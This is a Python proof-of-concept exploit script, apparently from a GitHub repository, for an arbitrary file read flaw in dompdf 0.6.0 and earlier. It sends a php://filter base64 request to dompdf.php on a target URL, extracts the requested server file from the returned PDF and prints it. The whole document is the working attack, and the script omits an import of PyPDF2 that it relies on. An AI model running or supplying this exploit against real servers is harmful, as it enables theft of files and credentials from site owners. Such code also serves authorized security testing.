/
dompdf_poc.py
66 lines (58 loc) · 2.4 KB
/
dompdf_poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#########################################################
## POC exploit for <= 0.6.0 dompdf - Arbitrary File Read
#########################################################
## Author: Drew 'farbs' Farber
## Copyright: Copyright 2020, <= 0.6.0 dompdf AFR POC
## License: MIT
#########################################################
# The required version the 'requests' module requires the chardet package to be installed. The version must be chardet <4, >=3.0.2.
# To install: python3 -m pip install "chardet==3.0.3"
import sys
import requests
import io
import base64
import warnings
# Ignore UserWarning due to occasional trailing whitespace during pdf to byte conversion
warnings.filterwarnings("ignore", category=UserWarning)
# Get the URL from the command line arguments
try:
url = str(sys.argv[1])
except IndexError:
print('Error: No URL supplied.\nExample: python3 dompdf_poc.py http://example.com')
sys.exit()
# Check if /dompdf.php is accessible
r = requests.get(f"{url}/dompdf/dompdf.php", allow_redirects=False)
if r.status_code in [200, 500]:
# Get the file path for retrieval
file_path = input("Enter file path for retrieval: ")
# Download the file
downfile = requests.get(f"{url}/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource={file_path}")
raw_data = downfile.content
pdf_data = io.BytesIO(raw_data)
# Read the PDF file
pdf_reader = PyPDF2.PdfFileReader(pdf_data)
# Decode the base64 data
if pdf_reader.isEncrypted:
pdf_reader.decrypt("")
b64 = pdf_reader.getPage(0).extractText().encode('ascii')
b64_output = b64.decode('ascii')
output = base64.b64decode(b64_output)
byte_output = str(output, 'utf-8')
formatted_output = byte_output.replace('\\n', '\n')
print(formatted_output)
else:
b64 = pdf_reader.getPage(0).extractText().encode('ascii')
b64_output = b64.decode('ascii')
output = base64.b64decode(b64_output)
byte_output = str(output, 'utf-8')
formatted_output = byte_output.replace('\\n', '\n')
print(formatted_output)
print(f"File '{file_path}' extracted successfully.")
elif r.status_code == 404:
print("Error: Received 404 Error Code. Did you fat-finger the URL?")
sys.exit()
else:
print(f"Error: URL {url} returned unexpected status code. Exiting...")
sys.exit()